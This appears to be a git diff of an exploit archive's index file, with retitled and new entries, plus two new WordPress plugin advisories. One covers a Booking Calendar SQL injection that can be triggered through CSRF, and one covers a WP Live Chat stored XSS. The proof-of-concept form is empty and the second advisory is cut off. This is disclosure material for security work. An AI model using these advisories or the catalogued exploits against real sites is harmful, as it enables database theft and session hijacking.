'backupCfg.cgi' Security Bypass",2013-10-15,"Richard Weinberger",hardware,remote,0 38805,platforms/multiple/remote/38805.txt,"SAP Sybase Adaptive Server Enterprise XML External Entity Information Disclosure",2015-11-25,"Igor Bulatenko",multiple,remote,0 -38806,platforms/cgi/webapps/38806.txt,"Bugzilla 'editflagtypes.cgi' Multiple Cross Site Scripting Vulnerabilities",2013-10-09,"Mateusz Goik",cgi,webapps,0 +38806,platforms/cgi/webapps/38806.txt,"Bugzilla 'editflagtypes.cgi' Multiple Cross-Site Scripting Vulnerabilities",2013-10-09,"Mateusz Goik",cgi,webapps,0 38807,platforms/cgi/webapps/38807.txt,"Bugzilla 4.2 Tabular Reports Unspecified XSS",2013-10-09,"Mateusz Goik",cgi,webapps,0 38808,platforms/php/webapps/38808.txt,"WordPress WP-Realty Plugin 'listing_id' Parameter SQL Injection",2013-10-08,Napsterakos,php,webapps,0 38809,platforms/php/remote/38809.php,"PHP Point Of Sale 'ofc_upload_image.php' Remote Code Execution",2013-10-18,Gabby,php,remote,0 @@ -35084,7 +35084,7 @@ id,file,description,date,author,platform,type,port 38816,platforms/jsp/webapps/38816.html,"JReport 'dealSchedules.jsp' Cross-Site Request Forgery",2013-10-25,"Poonam Singh",jsp,webapps,0 38817,platforms/linux/local/38817.txt,"Poppler 0.14.3 - '/utils/pdfseparate.cc' Local Format String",2013-10-26,"Daniel Kahn Gillmor",linux,local,0 38818,platforms/multiple/remote/38818.xml,"Openbravo ERP - XML External Entity Information Disclosure",2013-10-30,"Tod Beardsley",multiple,remote,0 -38819,platforms/php/webapps/38819.txt,"Course Registration Management System Cross Site Scripting and SQL Injection",2013-10-21,"Omar Kurt",php,webapps,0 +38819,platforms/php/webapps/38819.txt,"Course Registration Management System Cross-Site Scripting and SQL Injection",2013-10-21,"Omar Kurt",php,webapps,0 38820,platforms/php/webapps/38820.php,"WordPress This Way Theme 'upload_settings_image.php' Arbitrary File Upload",2013-11-01,Bet0,php,webapps,0 38821,platforms/android/remote/38821.py,"Google Android Signature Verification Security Bypass",2013-11-04,"Jay Freeman",android,remote,0 38822,platforms/windows/webapps/38822.rb,"Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection (Metasploit)",2015-11-28,hland,windows,webapps,8080 @@ -35174,7 +35174,7 @@ id,file,description,date,author,platform,type,port 38912,platforms/windows/remote/38912.txt,"Microsoft Windows Media Center Link File Incorrectly Resolved Reference",2015-12-09,"Core Security",windows,remote,0 38913,platforms/hardware/webapps/38913.txt,"WIMAX LX350P(WIXFMR-108) - Multiple Vulnerabilities",2015-12-09,alimp5,hardware,webapps,0 38914,platforms/hardware/webapps/38914.txt,"WIMAX MT711x - Multiple Vulnerabilities",2015-12-09,alimp5,hardware,webapps,0 -38915,platforms/php/webapps/38915.txt,"WordPress Plugin WP Easy Poll 1.1.3 - XSS and CSRF",2015-12-09,Mysticism,php,webapps,80 +38915,platforms/php/webapps/38915.txt,"WordPress Plugin WP Easy Poll 1.1.3 - XSS / CSRF",2015-12-09,Mysticism,php,webapps,80 38916,platforms/windows/dos/38916.html,"IE 11.0.9600.18097 COmWindowProxy::SwitchMarkup NULL PTR",2015-12-09,"Marcin Ressel",windows,dos,0 38917,platforms/osx/dos/38917.txt,"MacOS X 10.11 FTS Deep Structure of the File System Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",osx,dos,0 38918,platforms/windows/remote/38918.txt,"Microsoft Office / COM Object els.dll DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote,0 @@ -35222,7 +35222,7 @@ id,file,description,date,author,platform,type,port 39096,platforms/php/webapps/39096.txt,"i-doit Pro 'objID' Parameter SQL Injection",2014-02-17,"Stephan Rickauer",php,webapps,0 39097,platforms/linux/remote/39097.txt,"Red Hat Piranha Remote Security Bypass",2013-12-11,"Andreas Schiermeier",linux,remote,0 39098,platforms/php/webapps/39098.txt,"Joomla! Wire Immogest Component 'index.php' SQL Injection",2014-02-17,MR.XpR,php,webapps,0 -39057,platforms/php/webapps/39057.txt,"Dell Kace 1000 Systems Management Appliance DS-2014-001 Multiple SQL Injection",2014-01-13,"Rohan Stelling",php,webapps,0 +39057,platforms/php/webapps/39057.txt,"Dell Kace 1000 Systems Management Appliance DS-2014-001 - Multiple SQL Injection",2014-01-13,"Rohan Stelling",php,webapps,0 38964,platforms/hardware/remote/38964.rb,"Siemens Simatic S7 1200 CPU Command Module (Metasploit)",2015-12-14,"Nguyen Manh Hung",hardware,remote,102 39095,platforms/php/dos/39095.pl,"MyBB 1.6.12 - 'misc.php' Remote Denial of Service",2014-02-12,Amir,php,dos,0 38968,platforms/windows/remote/38968.txt,"Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132)",2015-12-14,"Google Security Research",windows,remote,0 @@ -35292,7 +35292,7 @@ id,file,description,date,author,platform,type,port 39033,platforms/php/webapps/39033.py,"Joomla 1.5 < 3.4.5 - Object Injection RCE X-Forwarded-For Header",2015-12-18,"Andrew McNicol",php,webapps,80 39034,platforms/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion Exploit",2015-12-18,bd0rk,php,webapps,80 39035,platforms/win_x86-64/local/39035.txt,"Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010)",2015-12-18,"Jean-Jamil Khalife",win_x86-64,local,0 -39099,platforms/php/webapps/39099.txt,"Rhino Cross Site Scripting and Password Reset Security Bypass Vulnerabilities",2014-02-12,Slotleet,php,webapps,0 +39099,platforms/php/webapps/39099.txt,"Rhino Cross-Site Scripting and Password Reset Security Bypass Vulnerabilities",2014-02-12,Slotleet,php,webapps,0 39037,platforms/windows/dos/39037.php,"Apache 2.4.17 - Denial of Service",2015-12-18,rUnViRuS,windows,dos,0 39038,platforms/php/webapps/39038.txt,"PFSense 2.2.5 - Directory Traversal",2015-12-18,R-73eN,php,webapps,0 39039,platforms/multiple/dos/39039.txt,"Google Chrome - Renderer Process to Browser Process Privilege Escalation",2015-12-18,"Google Security Research",multiple,dos,0 @@ -35319,7 +35319,7 @@ id,file,description,date,author,platform,type,port 39061,platforms/android/local/39061.txt,"GoToMeeting for Android Multiple Local Information Disclosure Vulnerabilities",2014-01-23,"Claudio J. Lacayo",android,local,0 39062,platforms/php/webapps/39062.txt,"ZenPhoto SQL Injection",2014-01-24,KedAns-Dz,php,webapps,0 39063,platforms/php/webapps/39063.txt,"WordPress WP e-Commerce Plugin Multiple Security Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0 -39064,platforms/php/webapps/39064.txt,"Maian Uploader 4.0 Multiple Security Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0 +39064,platforms/php/webapps/39064.txt,"Maian Uploader 4.0 - Multiple Security Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0 39065,platforms/php/webapps/39065.txt,"Eventum Insecure File Permissions",2014-01-27,"High-Tech Bridge",php,webapps,0 39066,platforms/php/webapps/39066.txt,"Eventum 'hostname' Parameter Remote Code Execution",2014-01-28,"High-Tech Bridge",php,webapps,0 39067,platforms/windows/dos/39067.py,"Notepad++ NPPFtp Plugin 0.26.3 - Buffer Overflow",2015-12-21,R-73eN,windows,dos,0 @@ -35342,7 +35342,7 @@ id,file,description,date,author,platform,type,port 39084,platforms/php/webapps/39084.txt,"Grawlix 1.0.3 - CSRF",2015-12-23,"Curesec Research Team",php,webapps,80 39085,platforms/php/webapps/39085.txt,"Arastta 1.1.5 - SQL Injection",2015-12-23,"Curesec Research Team",php,webapps,80 39086,platforms/php/webapps/39086.txt,"PhpSocial 2.0.0304_20222226 - CSRF",2015-12-23,"Curesec Research Team",php,webapps,80 -39087,platforms/php/webapps/39087.txt,"Singapore 0.9.9 b beta - Image Gallery Remote File Inclusion / Cross Site Scripting",2014-02-05,"TUNISIAN CYBER",php,webapps,0 +39087,platforms/php/webapps/39087.txt,"Singapore 0.9.9 b beta - Image Gallery Remote File Inclusion / Cross-Site Scripting",2014-02-05,"TUNISIAN CYBER",php,webapps,0 39088,platforms/php/webapps/39088.txt,"Joomla! Projoom NovaSFH Plugin 'upload.php' Arbitrary File Upload",2013-12-13,"Yuri Kramarz",php,webapps,0 39089,platforms/hardware/remote/39089.txt,"NETGEAR D6300B /diag.cgi IPAddr4 Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0 39090,platforms/php/webapps/39090.php,"WordPress Kiddo Theme Arbitrary File Upload",2014-02-05,"TUNISIAN CYBER",php,webapps,0 @@ -35355,7 +35355,7 @@ id,file,description,date,author,platform,type,port 39102,platforms/windows/local/39102.py,"EasyCafe Server 2.2.14 - Remote File Read",2015-12-26,R-73eN,windows,local,0 39103,platforms/windows/dos/39103.txt,"AccessDiver 4.301 - Buffer Overflow",2015-12-26,hyp3rlinx,windows,dos,0 39106,platforms/asp/webapps/39106.txt,"eshtery CMS 'FileManager.aspx' Local File Disclosure",2014-02-22,peng.deng,asp,webapps,0 -39107,platforms/php/webapps/39107.txt,"ATutor Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2014-02-22,HauntIT,php,webapps,0 +39107,platforms/php/webapps/39107.txt,"ATutor - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2014-02-22,HauntIT,php,webapps,0 39108,platforms/php/webapps/39108.txt,"POSH 3.1.x - 'addtoapplication.php' SQL Injection",2014-02-26,"Anthony BAUBE",php,webapps,0 39109,platforms/php/webapps/39109.txt,"WordPress Relevanssi Plugin 'category_name' Parameter SQL Injection",2014-03-04,anonymous,php,webapps,0 39110,platforms/php/webapps/39110.txt,"Cory Jobs Search 'cid' Parameter SQL Injection",2014-03-05,Slotleet,php,webapps,0 @@ -35389,7 +35389,7 @@ id,file,description,date,author,platform,type,port 39139,platforms/php/webapps/39139.txt,"PHPFox Access Control Security Bypass",2014-04-05,"Wesley Henrique",php,webapps,0 39140,platforms/php/webapps/39140.txt,"Joomla! Inneradmission Component 'index.php' SQL Injection",2014-04-08,Lazmania61,php,webapps,0 39141,platforms/php/webapps/39141.txt,"eazyCMS 'index.php' SQL Injection",2014-04-09,Renzi,php,webapps,0 -39142,platforms/jsp/webapps/39142.txt,"Xangati /servlet/MGConfigData Multiple Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0 +39142,platforms/jsp/webapps/39142.txt,"Xangati /servlet/MGConfigData - Multiple Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0 39143,platforms/jsp/webapps/39143.txt,"Xangati /servlet/Installer file Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0 39144,platforms/windows/dos/39144.html,"Internet Explorer 11.0.9600.18124 EdUtil::GetCommonAncestorElement - Denial of Service",2015-12-31,"Marcin Ressel",windows,dos,0 39145,platforms/cgi/webapps/39145.txt,"Xangati XSR And XNR - 'gui_input_test.pl' Remote Command Execution",2014-04-14,"Jan Kadijk",cgi,webapps,0 @@ -35405,7 +35405,7 @@ id,file,description,date,author,platform,type,port 39153,platforms/php/webapps/39153.txt,"iDevAffiliate 'idevads.php' SQL Injection",2014-04-22,"Robert Cooper",php,webapps,0 39154,platforms/hardware/remote/39154.txt,"Comtrend CT-5361T Router password.cgi Admin Password Manipulation CSRF",2014-04-21,"TUNISIAN CYBER",hardware,remote,0 39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass",2014-04-15,"Maksim Kochkin",linux,remote,0 -39156,platforms/cgi/webapps/39156.txt,"ZamFoo Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0 +39156,platforms/cgi/webapps/39156.txt,"ZamFoo - Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0 39157,platforms/php/webapps/39157.txt,"Puntopy 'novedad.php' SQL Injection",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0 39158,platforms/windows/dos/39158.txt,"Advanced Encryption Package Buffer Overflow - DoS",2016-01-03,Vishnu,windows,dos,0 39159,platforms/windows/local/39159.py,"FTPShell Client 5.24 - Add to Favorites Buffer Overflow",2016-01-04,INSECT.B,windows,local,0 @@ -35492,7 +35492,7 @@ id,file,description,date,author,platform,type,port 39244,platforms/linux/local/39244.txt,"Amanda 3.3.1 - amstar Command Injection Local Root",2016-01-15,"Hacker Fantastic",linux,local,0 39245,platforms/php/webapps/39245.txt,"Roundcube 1.1.3 - Path Traversal",2016-01-15,"High-Tech Bridge SA",php,webapps,80 39246,platforms/php/webapps/39246.txt,"mcart.xls Bitrix Module 6.5.2 - SQL Injection",2016-01-15,"High-Tech Bridge SA",php,webapps,80 -39250,platforms/php/webapps/39250.txt,"WordPress DZS-VideoGallery Plugin - Cross Site Scripting / Command Injection",2014-07-13,MustLive,php,webapps,0 +39250,platforms/php/webapps/39250.txt,"WordPress DZS-VideoGallery Plugin - Cross-Site Scripting / Command Injection",2014-07-13,MustLive,php,webapps,0 39251,platforms/php/webapps/39251.txt,"WordPress BookX Plugin 'includes/bookx_export.php' Local File Inclusion",2014-05-28,"Anant Shrivastava",php,webapps,0 39252,platforms/php/webapps/39252.txt,"WordPress WP Rss Poster Plugin 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 39253,platforms/php/webapps/39253.txt,"WordPress ENL Newsletter Plugin 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 @@ -35665,8 +35665,8 @@ id,file,description,date,author,platform,type,port 39426,platforms/multiple/dos/39426.txt,"Adobe Flash - Processing AVC Causes Stack Corruption",2016-02-08,"Google Security Research",multiple,dos,0 39427,platforms/php/webapps/39427.txt,"Employee Timeclock Software 0.99 - SQL Injection",2010-03-10,"Secunia Research",php,webapps,0 39428,platforms/windows/dos/39428.txt,"PotPlayer 1.6.5x - .mp3 Crash PoC",2016-02-09,"Shantanu Khandelwal",windows,dos,0 -39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0 -39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption 2",2016-02-09,"Francis Provencher",windows,dos,0 +39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0 +39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos,0 39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC IFF File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0 39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,windows,local,0 39433,platforms/linux/local/39433.py,"Deepin Linux 15 - lastore-daemon Privilege Escalation",2016-02-10,"King's Way",linux,local,0 @@ -35705,7 +35705,7 @@ id,file,description,date,author,platform,type,port 39471,platforms/windows/dos/39471.txt,"STIMS Buffer 1.1.20 - Buffer Overflow SEH (DoS)",2016-02-19,"Shantanu Khandelwal",windows,dos,0 39472,platforms/windows/dos/39472.txt,"STIMS Cutter 1.1.3.20 - Buffer Overflow DoS",2016-02-19,"Shantanu Khandelwal",windows,dos,0 39473,platforms/php/webapps/39473.txt,"Chamilo LMS IDOR - (messageId) Delete POST Inject",2016-02-19,Vulnerability-Lab,php,webapps,0 -39474,platforms/php/webapps/39474.txt,"Chamilo LMS - Persistent Cross Site Scripting",2016-02-19,Vulnerability-Lab,php,webapps,0 +39474,platforms/php/webapps/39474.txt,"Chamilo LMS - Persistent Cross-Site Scripting",2016-02-19,Vulnerability-Lab,php,webapps,0 39475,platforms/windows/dos/39475.py,"QuickHeal 16.00 - webssx.sys Driver DoS",2016-02-19,"Fitzl Csaba",windows,dos,0 39476,platforms/multiple/dos/39476.txt,"Adobe Flash - SimpleButton Creation Type Confusion",2016-02-19,"Google Security Research",multiple,dos,0 39477,platforms/windows/webapps/39477.txt,"ManageEngine Firewall Analyzer 8.5 - Multiple Vulnerabilities",2016-02-19,"Sachin Wagh",windows,webapps,8500 @@ -35784,7 +35784,7 @@ id,file,description,date,author,platform,type,port 39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - snd-usb-audio Crash PoC",2016-03-14,"OpenSource Security",linux,dos,0 39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - iowarrior driver Crash PoC",2016-03-14,"OpenSource Security",linux,dos,0 39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - SEH Overflow DoS",2016-03-14,INSECT.B,windows,dos,0 -39558,platforms/php/webapps/39558.txt,"WordPress Site Import Plugin 1.0.1 - Local and Remote File Inclusion",2016-03-14,Wadeek,php,webapps,80 +39558,platforms/php/webapps/39558.txt,"WordPress Site Import Plugin 1.0.1 - Local File Inclusion / Remote File Inclusion",2016-03-14,Wadeek,php,webapps,80 39559,platforms/php/webapps/39559.txt,"TeamPass 2.1.24 - Multiple Vulnerabilities",2016-03-14,"Vincent Malguy",php,webapps,80 39560,platforms/windows/dos/39560.txt,"Windows Kernel - ATMFD.DLL OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39561,platforms/windows/dos/39561.txt,"Windows Kernel - ATMFD.DLL OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 @@ -35862,7 +35862,7 @@ id,file,description,date,author,platform,type,port 39642,platforms/linux/webapps/39642.txt,"Apache OpenMeetings 1.9.x < 3.1.0 - ZIP File path Traversal",2016-03-31,"Andreas Lindh",linux,webapps,5080 39643,platforms/java/remote/39643.rb,"Apache Jetspeed Arbitrary File Upload",2016-03-31,Metasploit,java,remote,8080 39644,platforms/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap-based Out-of-Bounds Read",2016-03-31,"Google Security Research",multiple,dos,0 -39645,platforms/multiple/remote/39645.php,"PHP 5.5.33 / <= 7.0.4 - SNMP Format String Exploit",2016-04-01,"Andrew Kramer",multiple,remote,0 +39645,platforms/multiple/remote/39645.php,"PHP 5.5.33 / 7.0.4 - SNMP Format String Exploit",2016-04-01,"Andrew Kramer",multiple,remote,0 39646,platforms/php/webapps/39646.py,"WordPress Advanced Video Plugin 1.0 - Local File Inclusion",2016-04-01,"evait security GmbH",php,webapps,80 39647,platforms/windows/dos/39647.txt,"Windows Kernel - Bitmap Use-After-Free",2016-04-01,"Nils Sommer",windows,dos,0 39648,platforms/windows/dos/39648.txt,"Windows Kernel - NtGdiGetTextExtentExW Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",windows,dos,0 @@ -35967,14 +35967,14 @@ id,file,description,date,author,platform,type,port 39757,platforms/android/local/39757.txt,"QSEE - PRDiag* Commands Privilege Escalation Exploit",2016-05-02,laginimaineb,android,local,0 39758,platforms/lin_x86-64/shellcode/39758.c,"Linux/x86-64 - Bind 1472/TCP shellcode (IPv6) (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 39759,platforms/php/webapps/39759.txt,"Alibaba Clone B2B Script - Admin Authentication Bypass",2016-05-04,"Meisam Monsef",php,webapps,80 -39760,platforms/php/webapps/39760.txt,"CMS Made Simple < 2.1.3 & < 1.12.1 - Web Server Cache Poisoning",2016-05-04,"Mickaël Walter",php,webapps,80 +39760,platforms/php/webapps/39760.txt,"CMS Made Simple < 2.1.3 / < 1.12.1 - Web Server Cache Poisoning",2016-05-04,"Mickaël Walter",php,webapps,80 39761,platforms/php/webapps/39761.txt,"Acunetix WP Security Plugin 3.0.3 - XSS",2016-05-04,"Johto Robbie",php,webapps,80 39762,platforms/cgi/webapps/39762.txt,"NetCommWireless HSPA 3G10WVE Wireless Router - Multiple Vulnerabilities",2016-05-04,"Bhadresh Patel",cgi,webapps,80 39763,platforms/lin_x86-64/shellcode/39763.c,"Linux/x86-64 - Reverse TCP shellcode (IPv6) (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 39764,platforms/linux/local/39764.py,"TRN Threaded USENET News Reader 3.6-23 - Local Stack-Based Overflow",2016-05-04,"Juan Sacco",linux,local,0 39765,platforms/cgi/webapps/39765.txt,"IPFire < 2.19 Core Update 101 - Remote Command Execution",2016-05-04,"Yann CAM",cgi,webapps,0 39766,platforms/php/webapps/39766.php,"PHP Imagick 3.3.0 - disable_functions Bypass",2016-05-04,RicterZ,php,webapps,0 -39767,platforms/multiple/dos/39767.txt,"ImageMagick 6.9.3-9 / <= 7.0.1-0 - Multiple Vulnerabilities (ImageTragick)",2016-05-04,"Nikolay Ermishkin",multiple,dos,0 +39767,platforms/multiple/dos/39767.txt,"ImageMagick 6.9.3-9 / 7.0.1-0 - Multiple Vulnerabilities (ImageTragick)",2016-05-04,"Nikolay Ermishkin",multiple,dos,0 39768,platforms/multiple/dos/39768.txt,"OpenSSL Padding Oracle in AES-NI CBC MAC Check",2016-05-04,"Juraj Somorovsky",multiple,dos,0 39769,platforms/linux/local/39769.txt,"Zabbix Agent 3.0.1 - mysql.size Shell Command Injection",2016-05-04,"Timo Lindfors",linux,local,0 39770,platforms/windows/dos/39770.txt,"McAfee LiveSafe 14.0 - Relocations Processing Memory Corruption",2016-05-04,"Google Security Research",windows,dos,0 @@ -35996,10 +35996,10 @@ id,file,description,date,author,platform,type,port 39786,platforms/windows/local/39786.txt,"Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation",2016-05-09,LiquidWorm,windows,local,0 39788,platforms/windows/local/39788.txt,"Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2)",2016-05-09,hex0r,windows,local,0 39789,platforms/windows/dos/39789.py,"RPCScan 2.03 - Hostname/IP Field SEH Overwrite PoC",2016-05-09,"Nipun Jaswal",windows,dos,0 -39791,platforms/multiple/local/39791.rb,"ImageMagick 6.9.3-9 / <= 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)",2016-05-09,Metasploit,multiple,local,0 +39791,platforms/multiple/local/39791.rb,"ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)",2016-05-09,Metasploit,multiple,local,0 39792,platforms/ruby/remote/39792.rb,"Ruby on Rails Development Web Console (v2) Code Execution",2016-05-09,Metasploit,ruby,remote,3000 39966,platforms/windows/dos/39966.txt,"Blat 3.2.14 - Stack Overflow",2016-06-16,Vishnu,windows,dos,0 -39794,platforms/windows/shellcode/39794.c,"Windows - Functional Keylogger to File Null Free Shellcode (601 (0x0259) bytes)",2016-05-10,Fugu,windows,shellcode,0 +39794,platforms/windows/shellcode/39794.c,"Windows - Functional Keylogger to File Null Free Shellcode (601 (0x0259) bytes)",2016-05-10,Fugu,windows,shellcode,0 39795,platforms/windows/dos/39795.pl,"MediaInfo 0.7.61 - Crash PoC",2016-05-10,"Mohammad Reza Espargham",windows,dos,0 39796,platforms/windows/dos/39796.py,"Ipswitch WS_FTP LE 12.3 - Search field SEH Overwrite POC",2016-05-10,"Zahid Adeel",windows,dos,0 39797,platforms/windows/dos/39797.py,"Core FTP Server 32-bit Build 587 - Heap Overflow",2016-05-10,"Paul Purcell",windows,dos,21 @@ -36215,7 +36215,7 @@ id,file,description,date,author,platform,type,port 40019,platforms/php/webapps/40019.txt,"Kagao 3.0 - Multiple Vulnerabilities",2016-06-27,N4TuraL,php,webapps,80 40020,platforms/windows/local/40020.txt,"Panda Security Multiple Products - Privilege Escalation",2016-06-27,Security-Assessment.com,windows,local,0 40021,platforms/php/webapps/40021.php,"MyLittleForum 2.3.5 - PHP Command Injection",2016-06-27,hyp3rlinx,php,webapps,80 -40022,platforms/php/webapps/40022.txt,"iBilling 3.7.0 - Stored and Reflected XSS",2016-06-27,"Bikramaditya Guha",php,webapps,80 +40022,platforms/php/webapps/40022.txt,"iBilling 3.7.0 - Stored XSS / Reflected XSS",2016-06-27,"Bikramaditya Guha",php,webapps,80 40023,platforms/linux/local/40023.py,"PInfo 0.6.9-5.1 - Local Buffer Overflow",2016-06-27,"Juan Sacco",linux,local,0 40024,platforms/php/webapps/40024.txt,"BigTree CMS 4.2.11 - SQL Injection",2016-06-27,"Mehmet Ince",php,webapps,80 40025,platforms/linux/local/40025.py,"HNB 1.9.18-10 - Local Buffer Overflow",2016-06-27,"Juan Sacco",linux,local,0 @@ -36309,7 +36309,7 @@ id,file,description,date,author,platform,type,port 40148,platforms/windows/local/40148.py,"MediaCoder 0.8.43.5852 - .m3u SEH Exploit",2016-07-25,"Karn Ganeshen",windows,local,0 40149,platforms/php/webapps/40149.rb,"Drupal CODER Module 2.5 - Remote Command Execution (Metasploit)",2016-07-25,"Mehmet Ince",php,webapps,80 40150,platforms/php/webapps/40150.txt,"CodoForum 3.2.1 - SQL Injection",2016-07-25,"Yakir Wizman",php,webapps,80 -40151,platforms/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - .m3u Stack Overflow (Egghunter + ASLR bypass)",2016-07-25,"Karn Ganeshen",windows,local,0 +40151,platforms/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - .m3u Stack Overflow (Egghunter + ASLR Bypass)",2016-07-25,"Karn Ganeshen",windows,local,0 40153,platforms/php/webapps/40153.txt,"GRR Système de Gestion et de Réservations de Ressources 3.0.0-RC1 - Arbitrary File Upload",2016-07-25,kmkz,php,webapps,80 40154,platforms/php/webapps/40154.txt,"PHP gettext (gettext.php) 1.0.12 - Unauthenticated Code Execution",2016-07-25,kmkz,php,webapps,0 40155,platforms/php/dos/40155.py,"PHP 7.0.8 / 5.6.23 / 5.5.37 - bzread() Out-of-Bounds Write",2016-07-25,"Hans Jerry Illikainen",php,dos,80 @@ -36337,3 +36337,7 @@ id,file,description,date,author,platform,type,port 40180,platforms/linux/webapps/40180.txt,"Trend Micro Deep Discovery 3.7_ 3.8 SP1 (3.81)_ and 3.8 SP2 (3.82) - hotfix_upload.cgi filename Remote Code Execution",2016-07-29,korpritzombie,linux,webapps,443 40184,platforms/multiple/dos/40184.html,"WebKit - TypedArray.copyWithin Memory Corruption",2016-07-29,"Google Security Research",multiple,dos,0 40185,platforms/php/webapps/40185.py,"PhpMyAdmin 4.6.2 - Post-Auth Remote Code Execution",2016-07-29,@iamsecurity,php,webapps,80 +40189,platforms/php/webapps/40189.txt,"WordPress Booking Calendar Plugin 6.2 - SQL Injection",2016-08-01,"Edwin Molenaar",php,webapps,80 +40190,platforms/php/webapps/40190.txt,"WordPress WP Live Chat Support Plugin 6.2.03 - Stored XSS",2016-08-01,"Dennis Kerdijk & Erwin Kievith",php,webapps,80 +40191,platforms/php/webapps/40191.txt,"WordPress ALO EasyMail Newsletter Plugin 2.9.2 - (Add/Import Arbitrary Subscribers) CSRF",2016-08-01,"Yorick Koster",php,webapps,80 +40192,platforms/windows/dos/40192.py,"Halliburton LogView Pro 9.7.5 - (.cgm/.tif/.tiff/.tifh) Crash PoC",2016-08-01,"Karn Ganeshen",windows,dos,0 diff --git a/platforms/php/webapps/40189.txt b/platforms/php/webapps/40189.txt new file mode 100755 index 000000000..4478b3c3d --- /dev/null +++ b/platforms/php/webapps/40189.txt @@ -0,0 +1,45 @@ +SQL injection vulnerability in Booking Calendar WordPress Plugin + +Abstract + +An SQL injection vulnerability exists in the Booking Calendar WordPress plugin. This vulnerability allows an attacker to view data from the database. The affected parameter is not properly sanitized or protected with an anti-Cross-Site Request Forgery token. Consequently, it can (also be exploited by luring the target user into clicking a specially crafted link or visiting a malicious website (or advertisement). + +Contact + +For feedback or questions about this advisory mail us at sumofpwn at securify.nl + +The Summer of Pwnage + +This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam. + +OVE ID +OVE-20160714-0002 + +Tested versions + +These issues were successfully tested on Booking Calendar WordPress Plugin version 6.2. + +Fix + +This issue is resolved in Booking Calendar version 6.2.1. + +Introduction + +The Booking Calendar WordPress Plugin is a booking system for online reservation and availability checking service for your site. An SQL injection vulnerability exists in the Booking Calendar WordPress plugin. This vulnerability allows an attacker to view data from the database. The affected parameter is not properly sanitized or protected with an anti-Cross-Site Request Forgery token. Consequently, it can (also be exploited by luring the target user into clicking a specially crafted link or visiting a malicious website (or advertisement). + +Details + +This was discovered by the using the filter by Booking ID field. Because a WordPress user with the 'Editor' role can also use the Booking plugin, Editors can also access the vulnerable parameter. This allows these users to view all data from the database. The vulnerability exists in the wpdev_get_args_from_request_in_bk_listing() function from booking/lib/wpdev-bk-lib.php (line 709). + +Proof of concept + +The following proof of concept will show the hashed password from the first user. + + + +
+ + +
+ + \ No newline at end of file diff --git a/platforms/php/webapps/40190.txt b/platforms/php/webapps/40190.txt new file mode 100755 index 000000000..1cb90905b --- /dev/null +++ b/platforms/php/webapps/40190.txt @@ -0,0 +1,92 @@ +Stored Cross-Site Scripting vulnerability in WP Live Chat Support WordPress Plugin + +Abstract + +A stored Cross-Site Scripting vulnerability was found in the WP Live Chat Support WordPress Plugin. This issue can be exploited by an unauthenticated user. It allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. + +Contact + +For feedback or questions about this advisory mail us at sumofpwn at securify.nl + +The Summer of Pwnage + +This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam. + +OVE ID 